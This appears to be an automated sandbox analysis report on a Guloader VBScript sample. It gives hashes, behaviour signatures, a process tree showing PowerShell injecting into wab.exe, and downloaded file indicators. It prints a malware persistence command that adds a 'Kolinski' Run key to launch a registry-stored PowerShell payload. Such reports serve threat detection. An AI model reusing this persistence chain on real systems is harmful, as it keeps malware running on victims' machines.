Analysis
- max time kernel: 121s
- max time network: 122s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 21-05-2024 15:42
Static task: static1
Behavioral task: behavioral1
  Sample: Swift 2024052130819616.vbs
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: Swift 2024052130819616.vbs
  Resource: win10v2004-20240426-en
General
- Target: Swift 2024052130819616.vbs
- Size: 13KB
- MD5: 693d91041a54a578ada0c38a77634ee9
- SHA1: 13e0a6c85203356af7d11ff4a0e74a6b9637f466
- SHA256: bb8d35012cdd6408e23b9983549095e98a88c1ccf99fc447cb92bf9d6de71b91
- SHA512: 110e25ec6a8f8cb52a3d8a21e01ae9e2b308276111a70cd2afd64e187b41fbbedf9365170bacd971b26ee17a62df4b2174dd2580bcdb18ed768a06d01d860ccb
- SSDEEP: 192:lLZMMji78HauxUn+OKEtfuJkEF3UxO8OY7DIsRsTYEtoTP5CfQ6x7PwYVRWFo2Uj:DV8wtkyRi/aVvdb2ze
Malware Config
Signatures
- Guloader, Cloudeye
  A shellcode-based downloader first seen in 2020.
- Blocklisted process makes network request (2 IoCs)
  Processes (flow, PID, process):
  flow 6: PID 2692 powershell.exe
  flow 8: PID 2692 powershell.exe
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes (description, IoC, process):
  Set value (str): \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kolinski = "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\\Disputeredes\\').Semimachine;%Siestas% ($Macrorhamphosidae)" (reg.exe)
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
- Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  Processes (PID, process):
  PID 1784 wab.exe
  PID 1784 wab.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes (PID, process):
  PID 2332 powershell.exe
  PID 1784 wab.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes (description, PID, process, target process):
  set thread context: PID 2332 powershell.exe -> PID 1784 wab.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry key (1 TTP, 1 IoC)
- Runs ping.exe (1 TTP, 1 IoC)
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes (PID, process):
  PID 2692 powershell.exe
  PID 2332 powershell.exe
  PID 2332 powershell.exe
- Suspicious behavior: MapViewOfSection (1 IoC)
  Processes (PID, process):
  PID 2332 powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description, PID, process):
  Token: SeDebugPrivilege, PID 2692 powershell.exe
  Token: SeDebugPrivilege, PID 2332 powershell.exe
- Suspicious use of WriteProcessMemory (34 IoCs)
  Processes (description, PID, process, target process; identical rows collapsed, count in parentheses):
  PID 3028 WScript.exe wrote to memory of PID 1768 cmd.exe (3)
  PID 1768 cmd.exe wrote to memory of PID 2344 PING.EXE (3)
  PID 3028 WScript.exe wrote to memory of PID 2692 powershell.exe (3)
  PID 2692 powershell.exe wrote to memory of PID 2564 cmd.exe (3)
  PID 2692 powershell.exe wrote to memory of PID 2332 powershell.exe (4)
  PID 2332 powershell.exe wrote to memory of PID 2460 cmd.exe (4)
  PID 2332 powershell.exe wrote to memory of PID 1784 wab.exe (6)
  PID 1784 wab.exe wrote to memory of PID 2156 cmd.exe (4)
  PID 2156 cmd.exe wrote to memory of PID 1404 reg.exe (4)
Processes
(child processes are indented under their parent)
C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Swift 2024052130819616.vbs"
  - Suspicious use of WriteProcessMemory
  PID: 3028
  C:\Windows\System32\cmd.exe
    cmd.exe /c ping 6777.6777.6777.677e
    - Suspicious use of WriteProcessMemory
    PID: 1768
    C:\Windows\system32\PING.EXE
      ping 6777.6777.6777.677e
      - Runs ping.exe
      PID: 2344
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<obfuscated PowerShell script passed on the command line, omitted>"
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2692
    C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"
      PID: 2564
    C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<same obfuscated PowerShell script as the parent powershell.exe, omitted>"
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2332
      C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"
        PID: 2460
      C:\Program Files (x86)\windows mail\wab.exe
        "C:\Program Files (x86)\windows mail\wab.exe"
        - Suspicious use of NtCreateThreadExHideFromDebugger
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of WriteProcessMemory
        PID: 1784
        C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"
          - Suspicious use of WriteProcessMemory
          PID: 2156
          C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"
            - Adds Run key to start application
            - Modifies registry key
            PID: 1404
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NMVHAWC4JUP45QYF4J1X.temp
  Filesize: 7KB
  MD5: d67dd93a9e8101b470d1515d0ed0bf71
  SHA1: 8e669de97d9115b671c375568d4591c0d30add01
  SHA256: a69a74ce6b0c93318557667b4b8dba78e8467e078fa4974677bcb0c2614a1fef
  SHA512: ca25afab24a62dc9bdc5f470153c0f10483dba5088f0c4b199760c68487907a20767ef6f2f546434aa6198251f2b648f1b7ec390453bb9ee484543e1917f1a01
- Filesize: 476KB
  MD5: 5b31fdcca43851229c6ad5c0d5124d9e
  SHA1: 95243324bfd6acd008518e233e5ac3a7a29e67a5
  SHA256: c288a9c83ad9236a539faddaaa2d90d0beb42cc28c9b2f8009676ccd15b6b842
  SHA512: e4446a71ba0ce278980fdb6d286b55adcc97dd5b5a3c36da978de06916846bcc05cdf6ce8adb4176693b1d896c8ddd5499e37ab3ab08e8bac7468495c84038f5